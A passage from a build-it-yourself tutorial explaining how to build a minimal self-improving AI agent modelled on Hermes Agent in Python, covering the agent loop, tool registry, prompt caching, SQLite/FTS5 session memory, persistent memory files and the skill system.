A Build-It-Yourself Guide

Build a Mini
Hermes Agent
From Scratch

From Zero to Self-Improving AI Agent in Python
Understand every mechanism by building each one yourself

Contents

Part I: Understanding the Machine
  1. What Hermes Actually Is (And Why You Should Build One)
  2. The Architecture at 10,000 Feet
Part II: The Agent Loop
  1. Your First Agent Loop: Message In, Tool Call Out
  2. The Tool Registry: Teaching Your Agent to Act
  3. Prompt Construction: Assembling the Brain
  4. Prompt Caching: Keeping Costs Under Control
Part III: Memory That Lasts
  1. Session Memory: SQLite + FTS5
  2. Persistent Memory: Who Is This User?
  3. Cross-Session Recall: Finding the Right Memory
Part IV: Skills That Grow
  1. The Skill System: Folders, Progressive Disclosure, and skill_manage
  2. Autonomous Skill Creation
  3. Skill Self-Improvement: The Feedback Loop
Part V: Putting It All Together
  1. The Learning Loop: Nudges, Background Review, and Compression Flush
  2. Context Compression: Staying Within Token Budgets
  3. Building a CLI and Telegram Gateway
  4. What You Built and Where to Go Next
Part I

Understanding the Machine

01 What Hermes Actually Is

Before you write a single line of code, you need to understand what makes Hermes different from every other AI wrapper.

Most AI chat tools are stateless. You open a conversation, do some work, close it. Next time you open one, it starts from scratch. The model has no idea what you did yesterday.

Hermes Agent, built by Nous Research, takes a fundamentally different approach. It is an autonomous, self-improving agent that runs in the background on your own server. Three properties make it distinct:

  1. It remembers across sessions. Three layers of memory (session, persistent, skill) mean it knows what happened last week, who you are, and how to do things it learned from past work.
  2. It improves itself. After completing complex tasks, it offers to save reusable procedures as Skill files (confirming with you first). Background nudges periodically review conversations for things worth remembering. When you give feedback, it updates existing Skills. The more you use it, the better it gets.
  3. It runs without you. Deploy it on a $5 VPS, connect it to Telegram, and it works 24/7. Cron jobs, scheduled tasks, background monitoring. You check in when you want to.

The concept comes from Harness Engineering, a methodology coined by Mitchell Hashimoto (creator of Terraform). His insight: every time an AI makes a mistake, add a rule so it never makes the same mistake again. Over weeks, the AI accumulates enough rules to behave like a veteran team member.

Hashimoto did this manually, editing CLAUDE.md files by hand. Hermes automates the entire process. The agent observes its own performance, curates its own memory, and writes its own rules.

What we are building A minimal current Hermes: simplified code that follows the same architecture and design decisions as the real codebase. Where we simplify, each chapter's comparison box shows what the real Hermes does differently. The code compiles and runs; the architecture matches reality; the details are reduced.

What we are NOT building

The real Hermes has 40+ tools, MCP integration, 14 platform gateways, sub-agent delegation, and Honcho user modeling. We skip all of that. Our minimal version focuses on the four mechanisms that make Hermes interesting:

MechanismWhat it doesChapter
Agent LoopTake user input, call tools, return results03-05
Three-Layer MemoryRemember across sessions06-08
Skill SystemStore and retrieve procedural knowledge09-11
Learning LoopWire memory + skills into self-improvement12

By the end, you will understand every component well enough to extend it yourself.

02 The Architecture at 10,000 Feet

Five components, one data flow. This is the entire system.

INPUT User Message Prompt Builder identity + memory + skills + context LAYER 1-2 Memory LAYER 3 Skills LLM API Call tool call? yes no Execute Tool dispatch + return result OUTPUT Response to User after task Background Review nudge-triggered, separate thread save facts create/patch 1 2 3 4 5 6 main flow tool loop learning feedback

The diagram shows the complete data flow of a single turn. Here is what happens at each stage:

  1. User sends a message. Text comes in from CLI, Telegram, or any other interface.
  2. Prompt Builder assembles the system prompt. It pulls in the agent's identity, relevant memories from the database, matching skill files, and any context files. This assembled prompt is what the LLM actually sees.
  3. LLM generates a response. The response is either a text message (done) or one or more tool calls (continue looping).
  4. Tools execute and results feed back. The tool result is appended to the conversation, and the LLM is called again. This loop repeats until the model produces a final text response.
  5. Retrospective fires. After the task completes, the system evaluates the conversation. Should anything be remembered? Should a new Skill be created? Should an existing Skill be updated? This is the Learning Loop that makes the agent self-improving.

The dashed lines at the bottom are what make Hermes different from a normal chatbot. Those feedback paths close the loop, turning a stateless conversation into a system that accumulates knowledge.

Directory structure of our minimal agent

mini-hermes/ ├── agent.py # Main agent loop ├── prompt_builder.py # System prompt assembly ├── tool_registry.py # Tool registration + dispatch ├── tools/ │ ├── terminal.py # Shell command execution │ ├── file_tools.py # Read/write files │ └── memory_tool.py # Save/search memory ├── memory/ │ ├── session_db.py # SQLite + FTS5 session storage │ ├── persistent.py # MEMORY.md / USER.md management │ └── recall.py # Cross-session search + summarize ├── skills/ │ ├── loader.py # Discover + parse skill files │ ├── manager.py # Create / patch / delete skills │ └── retrospective.py # Post-task analysis + skill extraction ├── compression.py # Context window management ├── cli.py # Terminal interface ├── config.yaml # Model + API key + settings └── data/ ├── state.db # SQLite database ├── MEMORY.md # Persistent facts ├── USER.md # User profile └── skills/ # Skill markdown files

Everything lives under one directory. Memory, skills, config, database. When you want to migrate, back up this folder. When you want to start fresh, delete it.

Part II

The Agent Loop

03 Your First Agent Loop

A complete agent in under 100 lines. The loop is simple; what you feed into it is what makes it smart.

The core of any LLM agent is the conversation loop. You send messages to an LLM API, the model responds with either text or tool calls, you execute the tools and feed results back, and repeat until the model emits a final text response.

Here is the minimal loop, stripped to its essence:

import json
from openai import OpenAI
from tool_calling import strategy_for_model

class Agent:
    def __init__(self, client, model, system_prompt, tools, tool_handlers):
        self.client = client
        self.model = model
        self.tools = tools                # OpenAI tool schemas
        self.tool_handlers = tool_handlers  # name -> callable
        self._strategy = strategy_for_model(model)  # structured or text
        self.messages = [
            {"role": "system", "content": system_prompt}
        ]

    def run(self, user_input: str) -> str:
        """Send user message, loop through tool calls, return final text."""
        self.messages.append({"role": "user", "content": user_input})

        max_iterations = 15
        for _ in range(max_iterations):
            response = self._call_llm()

            msg = response.choices[0].message

            # Strategy parses the response uniformly
            content, tool_calls = self._strategy.parse_response(msg)

            # Build and append assistant message
            assistant_msg = self._strategy.build_assistant_msg(content, tool_calls)
            self.messages.append(assistant_msg)

            # If no tool calls, we're done
            if not tool_calls:
                return content

            # Execute each tool call
            for tc in tool_calls:
                result = self._execute_tool(tc.name, tc.arguments)

                # Strategy builds the right result message format
                result_msg = self._strategy.build_tool_result_msg(tc, result)
                self.messages.append(result_msg)

        return "[Max iterations reached]"

    def _call_llm(self):
        # Strategy decides whether to pass tools as API param
        # or inject them into the system prompt
        kwargs = {"model": self.model, "messages": self.messages, "max_tokens": 400}
        kwargs = self._strategy.prepare_kwargs(kwargs, self.tools)
        return self.client.chat.completions.create(**kwargs)

    def _execute_tool(self, name: str, args: dict) -> str:
        handler = self.tool_handlers.get(name)
        if not handler:
            return f"Error: unknown tool '{name}'"
        try:
            result = handler(**args)
            return str(result)[:50000]  # Truncate large outputs
        except Exception as e:
            return f"Error executing {name}: {e}"

That is the entire agent loop. Every LLM agent, from Claude Code to Hermes to OpenAI's Codex, is fundamentally this same pattern: call LLM, parse tool calls, execute tools, loop. Notice the loop never touches tool-call formats directly; the _strategy object handles all the format-specific logic. This means the same loop works with both structured (OpenAI-style) and text-based (Gemma, LLaMA) tool calling.

Intuition Think of the agent loop like a chef following a recipe. The LLM is the chef's brain deciding what to do next. Tools are the kitchen equipment. The message list is the chef's working memory of everything done so far. Each "turn" is the chef doing one action (chop onions, check the oven, plate the dish). The loop continues until the chef says "done."

The message list is everything

The self.messages list is the most important data structure in the system. It is the agent's entire working memory for the current session. Every user message, every assistant response, every tool call and result gets appended here.

The OpenAI-compatible message format looks like this:

RolePurposeKey Fields
systemAgent identity and instructionscontent
userHuman inputcontent
assistantModel responsecontent, tool_calls
toolResult of a tool calltool_call_id, content

This format is a de facto standard. It works with OpenAI, Anthropic (via OpenRouter), DeepSeek, and most open-source model APIs. Our minimal agent uses it throughout.

Why max_iterations matters

Without a cap, a confused model could loop forever, burning tokens. Hermes uses a budget system: each turn costs an iteration, and the agent stops when the budget is exhausted. Our minimal version uses a simple counter of 20, which is enough for most tasks.

Minimal version vs. real Hermes
This book Simple iteration counter. Synchronous tool execution. Single-model API calls.
Hermes v0.8 IterationBudget class with token tracking. Parallel tool batch detection via _should_parallelize_tool_batch(). Multi-provider support (OpenAI, Anthropic, Codex Responses API). Prompt caching. Reasoning field preservation.
Source: run_agent.py lines 7506-8600 (run_conversation())

Tool-calling strategies: structured vs. text

The loop above assumes the model returns structured tool_calls objects via the API. But many open models (Gemma, LLaMA, Phi) emit tool calls as text in the response body instead. Rather than a brittle fallback parser, we solve this with a strategy pattern: the agent delegates three decisions to a swappable strategy object:

DecisionStructuredStrategyTextStrategy
How tools are presentedPass tools API parameterInject tool descriptions into system prompt
How tool calls are parsedRead msg.tool_callsRegex-parse text content
How results are fed backrole: "tool" with tool_call_idrole: "user" with [Tool Result: name] prefix

The strategy is selected automatically based on the model name:

from tool_calling import ToolCallingStrategy, strategy_for_model

class Agent:
    def __init__(self, client, model, ...):
        self._strategy = strategy_for_model(model)  # picks based on model name

    def run(self, user_input):
        ...
        for _ in range(max_iterations):
            response = self._call_llm()
            msg = response.choices[0].message

            # Strategy handles parsing uniformly
            content, tool_calls = self._strategy.parse_response(msg)
            assistant_msg = self._strategy.build_assistant_msg(content, tool_calls)
            self.messages.append(assistant_msg)

            if not tool_calls:
                return content

            for tc in tool_calls:
                result = self._execute_tool(tc.name, tc.arguments)
                # Strategy builds the right message format
                result_msg = self._strategy.build_tool_result_msg(tc, result)
                self.messages.append(result_msg)

The text strategy parses several common formats that local models produce:

# Format 1: XML-style tags (Gemma, ChatML)
<tool_call>{"name": "terminal", "arguments": {"command": "ls"}}</tool_call>

# Format 2: call:name{json} (some Gemma variants)
call:terminal{command: "ls -la"}

# Format 3: Fenced JSON blocks
```json
{"name": "file_write", "arguments": {"path": "out.txt", "content": "hello"}}
```

When you switch models via /model in the CLI, the strategy updates automatically. This means you can chat with a structured model like Qwen, switch to Gemma mid-session, and tool calling keeps working.

Key design point The strategy pattern keeps the agent loop itself clean: it never has to know how tool calls arrive. Adding support for a new model format means adding a regex pattern to TextStrategy, not touching the agent loop.

04 The Tool Registry

Tools turn your agent from a chatbot into something that can actually do things.

An agent without tools is just a chatbot. The tool registry is the mechanism that lets you define what actions the agent can take, expose them to the LLM in the right format, and dispatch calls to the right handler.

The registry pattern

from dataclasses import dataclass, field
from typing import Callable, Any

@dataclass
class ToolEntry:
    name: str
    description: str
    parameters: dict        # JSON Schema for the function args
    handler: Callable
    category: str = "general"

class ToolRegistry:
    def __init__(self):
        self._tools: dict[str, ToolEntry] = {}

    def register(self, name, description, parameters, handler, category="general"):
        self._tools[name] = ToolEntry(
            name=name,
            description=description,
            parameters=parameters,
            handler=handler,
            category=category,
        )

    def get_schemas(self, categories=None) -> list[dict]:
        """Return OpenAI-compatible tool schemas."""
        tools = self._tools.values()
        if categories:
            tools = [t for t in tools if t.category in categories]
        return [
            {
                "type": "function",
                "function": {
                    "name": t.name,
                    "description": t.description,
                    "parameters": t.parameters,
                },
            }
            for t in tools
        ]

    def execute(self, name: str, args: dict) -> str:
        entry = self._tools.get(name)
        if not entry:
            raise ValueError(f"Unknown tool: {name}")
        return str(entry.handler(**args))

# Global registry instance
registry = ToolRegistry()

Registering tools

Each tool is a Python function with a JSON Schema describing its parameters. Here is a minimal terminal tool:

import subprocess
from tool_registry import registry

def run_terminal(command: str, timeout: int = 30) -> str:
    """Execute a shell command and return stdout + stderr."""
    try:
        result = subprocess.run(
            command, shell=True, capture_output=True,
            text=True, timeout=timeout
        )
        output = result.stdout + result.stderr
        return output.strip() or "(no output)"
    except subprocess.TimeoutExpired:
        return "Error: command timed out"

registry.register(
    name="terminal",
    description="Run a shell command. Use for git, file ops, builds, etc.",
    parameters={
        "type": "object",
        "properties": {
            "command": {"type": "string", "description": "Shell command to execute"},
            "timeout": {"type": "integer", "description": "Timeout in seconds", "default": 30},
        },
        "required": ["command"],
    },
    handler=run_terminal,
    category="execution",
)
Security Running shell commands from an LLM is dangerous. The real Hermes has a Docker-based sandbox with a read-only filesystem, dropped Linux capabilities, and namespace isolation. For our minimal version, be careful what you let the agent do. Consider restricting commands to a safelist for production use.

Toolsets: controlling what the agent can access

Minimal version vs. real Hermes
This book Dict-based registry. Flat category strings. Manual tool discovery.
Hermes v0.8 ToolRegistry singleton with lazy module imports, check_fn for availability gates, max_result_size truncation, and composable toolsets that can include other toolsets. MCP tools auto-discovered at startup. 40+ built-in tools across 5 categories.
Source: tools/registry.py, model_tools.py, toolsets.py

Hermes groups tools into toolsets (categories like "web", "terminal", "file", "memory"). You enable or disable entire toolsets in the config. This matters for two reasons:

Fewer tools = better decisions. An LLM with 100 tools available makes worse tool-selection choices than one with 10. Only expose what the task needs.

Toolsets are security boundaries. A research sub-agent should have web access but not terminal access. A coding sub-agent needs terminal but not web. The category field on each tool entry makes this filtering trivial.

05 Prompt Construction

The system prompt is the single biggest lever you have. It determines what kind of agent you get.

In Hermes, the system prompt is built once per session and then frozen. It is not reassembled on every turn. This frozen snapshot is reused across all API calls in the session, which is critical for prompt caching (Chapter 6). The prompt is only rebuilt after context compression events.

class PromptBuilder:
    def build(self, memory_block: str, skills_index: str, user_context: str) -> str:
        sections = []

        # 1. Core identity
        sections.append(self.IDENTITY)

        # 2. Persistent memory (who is this user, what do I know)
        if memory_block:
            sections.append(f"## What I Remember\n{memory_block}")

        # 3. Available skills (what procedures do I know)
        if skills_index:
            sections.append(f"## Available Skills\n{skills_index}")

        # 4. User context files (project-specific info)
        if user_context:
            sections.append(f"## Project Context\n{user_context}")

        # 5. Behavioral guidance
        sections.append(self.MEMORY_GUIDANCE)
        sections.append(self.SKILLS_GUIDANCE)
        sections.append(self.TOOL_USE_GUIDANCE)

        return "\n\n".join(sections)

    IDENTITY = """You are a helpful AI assistant with persistent memory \
and self-improving skills. You remember past conversations and learn \
from experience. Use your tools to accomplish tasks."""

    MEMORY_GUIDANCE = """## Memory Instructions
After completing tasks, actively decide what's worth remembering:
- User preferences and habits
- Project context and architecture decisions
- Solutions to problems that might recur
Use the memory tool to persist important observations."""

    SKILLS_GUIDANCE = """## Skill Instructions
After difficult or iterative tasks, offer to save as a skill. \
Confirm with the user before creating or deleting. Use the \
skill_manage tool with action="create" for new skills, \
action="patch" (old_string/new_string) to fix existing ones.
Skip for simple one-offs."""

    TOOL_USE_GUIDANCE = """## Tool Use
Take action. Don't just describe what you would do - actually do it. \
If the user asks you to write code, write the file. If they ask you \
to run something, run it. Prefer action over explanation."""

The real Hermes has extensive prompt sections. The three guidance blocks above are the critical ones that drive the self-improvement behavior:

GuidanceWhat it steers
MEMORY_GUIDANCETells the agent when and what to save to persistent memory
SKILLS_GUIDANCETells the agent to offer saving reusable procedures, confirm before creating
TOOL_USE_GUIDANCEPrevents the agent from just planning without acting
Key insight The self-improvement behavior is not magic. It is steered by prompt instructions and background nudges. The agent offers to save skills (and confirms with the user), and the nudge system periodically reviews conversations in the background. The LLM's instruction-following capability does the rest.
Minimal version vs. real Hermes
This book Frozen snapshot: build once at session start from identity + memory + skills index + guidance. Not rebuilt per turn.
Hermes v0.8 Frozen per session, only rebuilt after compression. Cached on _cached_system_prompt. Continuing sessions load the stored prompt from session DB instead of rebuilding (preserves Anthropic prefix cache). Whitespace normalization for KV-cache consistency. Skill body injection. Tool-use enforcement guidance.
Source: agent/prompt_builder.py

Frozen snapshot vs. per-turn injection

There are two paths for memory to reach the LLM:

SourceWhere it goesWhen it updates
Built-in memory (MEMORY.md, USER.md)System prompt (frozen snapshot)Once per session; only rebuilt after compression
External memory providers (Honcho, etc.)Injected into user message per turnEvery turn via prefetch_all()

The built-in memory is a frozen snapshot: it is read from disk when the session starts and baked into the system prompt. Even if the agent writes new observations during the session (via the memory tool), those writes go to disk but do not appear in the system prompt until the next session (or after compression rebuilds it). This is a deliberate choice for prompt caching stability.

External memory providers can inject per-turn context into the user message, but this is optional and only applies if a provider like Honcho is configured.

For our minimal build, the simple approach works: load MEMORY.md at session start, bake it into the system prompt, do not touch it again until the session ends.

06 Prompt Caching

Every token you re-send costs money. Prompt caching is how Hermes keeps multi-turn conversations affordable.

In a 20-turn conversation, the system prompt (identity + memory + skills) is sent with every API call. Without caching, you pay for those tokens 20 times. Anthropic's prompt caching lets you mark message boundaries as cache breakpoints. Cached prefixes cost ~90% less on subsequent requests.

Hermes implements a strategy called system_and_3: it places cache breakpoints on the system prompt (stable across all turns) plus the last 3 non-system messages (a rolling window). Anthropic allows a maximum of 4 breakpoints, so this uses all of them.

import copy

def apply_prompt_caching(messages, cache_ttl="5m"):
    """Apply system_and_3 caching: system prompt + last 3 messages."""
    messages = copy.deepcopy(messages)
    marker = {"type": "ephemeral"}

    breakpoints_used = 0

    # 1. Cache the system prompt (stable across all turns)
    if messages[0].get("role") == "system":
        _mark_message(messages[0], marker)
        breakpoints_used += 1

    # 2-4. Cache the last 3 non-system messages (rolling window)
    remaining = 4 - breakpoints_used
    non_sys = [i for i in range(len(messages))
               if messages[i].get("role") != "system"]
    for idx in non_sys[-remaining:]:
        _mark_message(messages[idx], marker)

    return messages

def _mark_message(msg, marker):
    """Add cache_control to a message, handling string and list content."""
    content = msg.get("content")
    if isinstance(content, str):
        # Convert to content block format for cache_control
        msg["content"] = [
            {"type": "text", "text": content, "cache_control": marker}
        ]
    elif isinstance(content, list) and content:
        content[-1]["cache_control"] = marker
    else:
        msg["cache_control"] = marker

Why this constrains the architecture

Prompt caching is not just an optimization. It constrains how you build the system prompt:

Design constraintWhy it matters for caching
System prompt must be stableIf it changes every turn, the cache is invalidated and you pay full price. Memory and skills content must stay constant within a session.
Whitespace must be normalizedEven a trailing space change invalidates the cache. Hermes normalizes whitespace before every API call for KV-cache consistency.
Ephemeral context goes in user messagesPrefetched memories are injected into the user message, not the system prompt, because user messages rotate out of the cache window naturally.
Deep copy before markingCache markers modify the message structure (string to content-block array). The original messages must be preserved for session persistence.
Intuition Think of it like a restaurant menu. The menu (system prompt) stays the same for every customer. The order (user messages) changes. You print the menu once and reuse it; you write each order fresh. If you changed the menu every meal, you would waste time reprinting it. Same with tokens: keep the stable parts stable, and only pay to transmit what changes.
Minimal version vs. real Hermes
This book Basic system_and_3 strategy. Single TTL. Works with OpenRouter Anthropic models.
Hermes v0.8 Supports both 5m and 1h TTL. Native Anthropic adapter for direct API calls (different cache_control placement). Provider detection to skip caching for non-Anthropic models. Applied in _prepare_api_messages() just before the API call.
Source: agent/prompt_caching.py, agent/anthropic_adapter.py
Part III

Memory That Lasts

07 Session Memory: SQLite + FTS5

Every conversation gets recorded with full-text search. This is the agent's episodic memory.

Session memory answers the question: what happened? It records every conversation turn in a SQLite database with FTS5 full-text indexing. Think of it as the agent's conversation diary.

Why SQLite + FTS5

Most AI tools either forget everything (stateless) or dump everything into the context window (expensive and slow). Hermes uses on-demand retrieval: store everything, search when needed, inject only what is relevant.

ApproachLoad EverythingOn-Demand (Hermes)
Context usageGrows linearlyEssentially constant
PrecisionEverything is there but nothing is findableKeyword matching, precise
Long-term viabilityBreaks after a few daysWorks for months
Response speedSlows over timeStays the same

FTS5 is SQLite's built-in full-text search extension. No extra database to install. All data lives in a local file. No network dependency, no privacy concerns.

The schema

import sqlite3
import uuid
from datetime import datetime

class SessionDB:
    def __init__(self, db_path: str):
        self.db_path = db_path
        self.conn = sqlite3.connect(db_path)
        self.conn.execute("PRAGMA journal_mode=WAL")  # Concurrent reads
        self._create_tables()

    def _create_tables(self):
        self.conn.executescript("""
            CREATE TABLE IF NOT EXISTS sessions (
                id TEXT PRIMARY KEY,
                source TEXT DEFAULT 'cli',
                started_at REAL,
                ended_at REAL,
                message_count INTEGER DEFAULT 0,
                summary TEXT
            );

            CREATE TABLE IF NOT EXISTS messages (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                session_id TEXT REFERENCES sessions(id),
                role TEXT NOT NULL,
                content TEXT,
                tool_name TEXT,
                tool_call_id TEXT,
                timestamp REAL
            );

            CREATE VIRTUAL TABLE IF NOT EXISTS messages_fts
            USING fts5(content, content_rowid='id');
        """)
        self.conn.commit()

    def create_session(self, source="cli") -> str:
        session_id = str(uuid.uuid4())
        self.conn.execute(
            "INSERT INTO sessions (id, source, started_at) VALUES (?, ?, ?)",
            (session_id, source, datetime.now().timestamp())
        )
        self.conn.commit()
        return session_id

    def append_message(self, session_id, role, content,
                        tool_name=None, tool_call_id=None):
        cursor = self.conn.execute(
            """INSERT INTO messages
               (session_id, role, content, tool_name, tool_call_id, timestamp)
               VALUES (?, ?, ?, ?, ?, ?)""",
            (session_id, role, content, tool_name, tool_call_id,
             datetime.now().timestamp())
        )
        # Index in FTS5 (only user and assistant messages)
        if role in ("user", "assistant") and content:
            self.conn.execute(
                "INSERT INTO messages_fts (rowid, content) VALUES (?, ?)",
                (cursor.lastrowid, content)
            )
        self.conn.commit()

    def search(self, query: str, limit: int = 20) -> list[dict]:
        """Full-text search across all sessions."""
        sanitized = self._sanitize_fts_query(query)
        rows = self.conn.execute("""
            SELECT m.session_id, m.role,
                   snippet(messages_fts, 0, '>>>', '<<<', '...', 40) as snippet,
                   s.source, s.started_at
            FROM messages_fts
            JOIN messages m ON m.id = messages_fts.rowid
            JOIN sessions s ON s.id = m.session_id
            WHERE messages_fts MATCH ?
            ORDER BY rank
            LIMIT ?
        """, (sanitized, limit)).fetchall()
        return [
            {"session_id": r[0], "role": r[1], "snippet": r[2],
             "source": r[3], "date": datetime.fromtimestamp(r[4]).isoformat()}
            for r in rows
        ]

    def _sanitize_fts_query(self, query: str) -> str:
        """Clean user input for FTS5 safety."""
        # Remove special FTS5 operators that could cause errors
        for char in ['"', '*', '+', '-', '(', ')', ':']:
            query = query.replace(char, ' ')
        # Split into words, wrap each as a prefix match
        words = [w.strip() for w in query.split() if w.strip()]
        return ' '.join(words) if words else '""'

Two important implementation details:

WAL mode (PRAGMA journal_mode=WAL) enables concurrent readers with a single writer. This matters when the gateway process is handling messages from multiple platforms while the agent is also writing to the database.

FTS5 query sanitization is essential. User queries can contain special characters that break FTS5 syntax. The sanitizer strips operators and treats input as plain keyword search.

Intuition Session memory is like a diary with an index. You write everything down, but you do not re-read the entire diary every morning. You look up specific entries when you need them. The FTS5 index is that lookup mechanism.
Minimal version vs. real Hermes
This book Single-threaded writes. Basic FTS5 MATCH queries. Inline search function.
Hermes v0.8 WAL mode with application-level jitter retry (20-150ms) for write contention via _execute_write(). Stores tool_calls, reasoning fields, and Codex reasoning items. Session metadata tracks token counts, estimated cost, and parent session IDs for sub-agent continuations.
Source: hermes_state.py (SessionDB class, ~1239 lines)

08 Persistent Memory

Session memory records what happened. Persistent memory records who you are and what matters.

Persistent memory answers the question: who is this user? It stores durable facts distilled from conversations: coding preferences, commonly used tools, project context, work habits. These persist across sessions and are loaded at startup.

In Hermes, this is implemented as two simple markdown files:

Both files are loaded as a frozen snapshot when a session starts and baked into the system prompt. Writes during the session go to disk but do not update the running prompt until the next session or after context compression rebuilds it. This is critical for prompt caching (see Chapter 6).

from pathlib import Path

class PersistentMemory:
    MEMORY_LIMIT = 2200   # Hermes default for observations
    USER_LIMIT = 1375     # Hermes default for user profile

    def __init__(self, data_dir: Path):
        self.memory_path = data_dir / "MEMORY.md"
        self.user_path = data_dir / "USER.md"
        # Create files if they don't exist
        self.memory_path.touch(exist_ok=True)
        self.user_path.touch(exist_ok=True)

    def load(self) -> str:
        """Load both files as a combined context block."""
        parts = []
        memory = self.memory_path.read_text().strip()
        user = self.user_path.read_text().strip()
        if user:
            parts.append(f"### User Profile\n{user}")
        if memory:
            parts.append(f"### Observations\n{memory}")
        return "\n\n".join(parts)

    def save_observation(self, text: str):
        """Append an observation, respecting the size limit."""
        current = self.memory_path.read_text()
        new_entry = f"\n- {text}"
        if len(current) + len(new_entry) > self.MEMORY_LIMIT:
            lines = current.strip().split("\n")
            while lines and len("\n".join(lines)) + len(new_entry) > self.MEMORY_LIMIT:
                lines.pop(0)
            current = "\n".join(lines)
        self.memory_path.write_text(current + new_entry)

    def update_user_profile(self, text: str):
        """Replace the user profile."""
        self.user_path.write_text(text[:self.USER_LIMIT])

The size limits (2,200 for memory, 1,375 for user profile) are deliberate. This content is frozen into the system prompt at session start, so it consumes tokens on every API call. The combined ~3,575 characters keeps the overhead predictable while still being useful.

What belongs in persistent memory

SaveDo NOT save
User preferences (code style, editor, OS)One-off task details
Project context (tech stack, architecture decisions)Outdated API version numbers
Recurring patterns (preferred error handling approach)Sensitive data (passwords, keys)
Validated solutions (what worked)Wrong inferences (should be corrected, not stored)
Memory pollution Hermes has no automatic expiration mechanism. If the agent saves an incorrect observation early on (e.g., "user prefers Python 2"), that error will persist and affect future behavior. Periodic manual review of the MEMORY.md file is important. This is a known limitation.
Minimal version vs. real Hermes
This book Two flat files: MEMORY.md (2,200 chars) + USER.md (1,375 chars). Frozen snapshot loaded at session start. Simple append with oldest-first eviction.
Hermes v0.8 Same built-in provider (MEMORY.md + USER.md), plus a pluggable MemoryProvider architecture. External providers (Honcho, Mem0, Hindsight) can be swapped in. Only one external provider active at a time. Hooks: on_session_end(), on_pre_compress(), on_delegation(), on_memory_write().
Source: agent/memory_manager.py, agent/memory_provider.py

09 Cross-Session Recall

The trick is not remembering everything. It is finding the right piece at the right time.

Cross-session recall connects the session database (Chapter 7) to the current conversation. When the agent needs to remember something from a past session, it searches the FTS5 index, retrieves the most relevant fragments, and summarizes them for injection into the current context.

class SessionRecall:
    def __init__(self, session_db, llm_client, model):
        self.db = session_db
        self.client = llm_client
        self.model = model

    def recall(self, query: str, max_sessions: int = 3) -> str:
        """Search past sessions and return summarized context."""
        # Step 1: FTS5 search
        results = self.db.search(query, limit=30)
        if not results:
            return ""

        # Step 2: Group by session, take top N unique sessions
        seen_sessions = {}
        for r in results:
            sid = r["session_id"]
            if sid not in seen_sessions:
                seen_sessions[sid] = r
            if len(seen_sessions) >= max_sessions:
                break

        # Step 3: For each session, load conversation around matches
        summaries = []
        for sid, meta in seen_sessions.items():
            messages = self.db.get_session_messages(sid, limit=30)
            transcript = self._format_transcript(messages)

            # Step 4: Summarize via cheap/fast LLM
            summary = self._summarize(query, transcript, meta["date"])
            summaries.append(summary)

        return "\n\n---\n\n".join(summaries)

    def _summarize(self, topic, transcript, date) -> str:
        resp = self.client.chat.completions.create(
            model=self.model,
            messages=[
                {"role": "system", "content":
                 "Summarize this past conversation, focusing on information "
                 "relevant to the given topic. Be concise. 200 words max."},
                {"role": "user", "content":
                 f"Topic: {topic}\nDate: {date}\n\nTRANSCRIPT:\n{transcript}"}
            ],
            max_tokens=self.max_tokens,  # default 300
        )
        return resp.choices[0].message.content

The four-step flow:

  1. FTS5 search. Find messages matching the query across all sessions.
  2. Group by session. Take the top 3 unique sessions (not individual messages).
  3. Load conversation context. For each session, pull surrounding messages to preserve conversational flow.
  4. Summarize via LLM. Use a cheap, fast model to condense each session's transcript into a focused summary. This is where the real token savings happen.
Why summarize instead of injecting raw transcripts A past session might be 10,000 tokens. You might recall 3 sessions. That is 30,000 tokens of raw context for every query. Summarization compresses each to ~200 words, keeping the total under 2,000 tokens. The cost of one cheap LLM call is far less than the cost of stuffing 30K extra tokens into every subsequent API call.

Making it a tool

Cross-session recall is exposed to the agent as a tool called session_search. The agent decides when to search its own history:

registry.register(
    name="session_search",
    description="Search past conversations for relevant context. "
                 "Use when you need to recall what was discussed previously.",
    parameters={
        "type": "object",
        "properties": {
            "query": {"type": "string", "description": "Search topic"},
        },
        "required": ["query"],
    },
    handler=recall.recall,
    category="memory",
)

This is elegant. The agent is not force-fed history. It actively searches when it recognizes that past context would be useful. "That approach we discussed last week" triggers a search. "Write a hello world script" does not.

Minimal version vs. real Hermes
This book Synchronous search + summarize. Top 3 sessions. Single summarization model.
Hermes v0.8 Async summarization via _summarize_session(). Session truncation around match locations (_truncate_around_matches(), 100K char limit). Groups by session with deduplication. Uses auxiliary LLM (cheap/fast, e.g. Gemini Flash) for summaries (up to 10K tokens per session).
Source: tools/session_search_tool.py, hermes_state.py (search_messages())
Part IV

Skills That Grow

10 The Skill System

Skills are folders containing a SKILL.md file, supporting references, and templates. The agent discovers, loads, and manages them through three dedicated tools.

If session memory is "what happened" and persistent memory is "who you are," then skills are "how to do things." Each Skill is a directory under ~/.hermes/skills/ containing a SKILL.md file and optional supporting files.

Skill directory structure

~/.hermes/skills/ ├── git-commit-style/ │ └── SKILL.md # Required: instructions ├── code-review/ │ ├── SKILL.md │ ├── references/ # Supporting documentation │ │ └── style-guide.md │ ├── templates/ # Output templates │ │ └── review-format.md │ ├── scripts/ # Helper scripts │ └── assets/ # Supplementary files └── mlops/ # Category folder └── training/ └── SKILL.md

This is the agentskills.io standard, supported by Claude Code, Cursor, Codex CLI, Gemini CLI, and others. Skills are portable across tools.

Anatomy of a SKILL.md file

---
name: git-commit-style
description: Enforce a consistent Git commit message format
version: "1.0.0"
platforms: [macos, linux]    # Optional: restrict to OS
metadata:
  hermes:
    tags: [git, workflow]
    requires_toolsets: [terminal]
---

# Git Commit Style

## Trigger
Activate when the user asks me to commit code, write a commit
message, or review commit history.

## Rules
### Commit Message Format
- First line: type(scope): summary (50 chars max)
- Blank line
- Body: explain WHY, not WHAT

## Example
feat(auth): add QR code login

Previously users could only log in with a phone number.
Now they scan a QR code and they're in.

Three tools, three tiers of progressive disclosure

Hermes uses a progressive disclosure pattern to keep token costs flat as the skill library grows. The agent sees skill names cheaply and loads full content only when needed:

ToolWhat it returnsToken cost
skills_listName + description for all skills (max 64 + 1024 chars each)Low: metadata only
skill_viewFull SKILL.md body, or a specific file within the skill directoryMedium: one skill at a time
skill_manageCreate / edit / patch / delete / write_file / remove_fileVaries by action
# The three skill tools

def skills_list(category=None) -> str:
    """List all skills with metadata. Progressive disclosure tier 1."""
    skills = []
    for skill_md in skills_dir.rglob("SKILL.md"):
        meta, _ = parse_frontmatter(skill_md.read_text())
        if not meta or not skill_matches_platform(meta):
            continue
        skills.append({
            "name": meta.get("name", skill_md.parent.name),
            "description": meta.get("description", "")[:1024],
        })
    return json.dumps(skills, indent=2)

def skill_view(name: str, file_path: str = None) -> str:
    """Load full skill content. Progressive disclosure tier 2-3."""
